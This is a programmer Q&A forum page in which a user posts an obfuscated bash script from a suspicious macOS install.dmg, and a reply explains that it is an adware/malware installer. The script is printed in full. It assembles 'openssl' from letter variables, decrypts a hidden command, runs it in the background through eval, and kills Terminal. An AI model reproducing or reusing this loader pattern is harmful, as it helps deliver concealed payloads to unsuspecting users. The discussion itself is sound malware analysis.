Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Welcome To Ask or Share your Answers For Others

Categories

0 votes
202 views
in Technique[技术] by (71.8m points)

macos - How harmful is this command?

#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval "$decryptedCommand"" >/dev/null 2>&1 &
killall Terminal 

I got this from a shady install.dmg file that automatically downloaded. I obviously didn't run this so I thought I might ask you guys here.

See Question&Answers more detail:os

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome To Ask or Share your Answers For Others

1 Reply

0 votes
by (71.8m points)

Short answer: Do NOT run it. Kill it with fire, unless you're interested in analyzing it as malware.

It's an obfuscated malware installer script. The script itself is pretty generic, but there's another (encrypted) file in the same directory that's the real payload, and it's almost certainly malware. In fact this looks like a near-exact match for one I looked at a while ago. Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection.

Explanation: if this is a match for the one I looked at before, there's another file there named "2P1zsqQ" alongside this script. That filename is used as a password to decrypt the commandArgs string into a shell command string, which has instructions to decrypt the 2P1zsqQ file itself (with the same password) as /tmp/<somethingrandom>/Qqsz1P2, run that (decrypted) executable, and then delete it (while this script kills the Terminal app, thus hiding what's going on).

BTW, this question is about a similar malware installer script; maybe an earlier version with slightly less obfuscation.


与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
OGeek|极客中国-欢迎来到极客的世界,一个免费开放的程序员编程交流平台!开放,进步,分享!让技术改变生活,让极客改变未来! Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Click Here to Ask a Question

...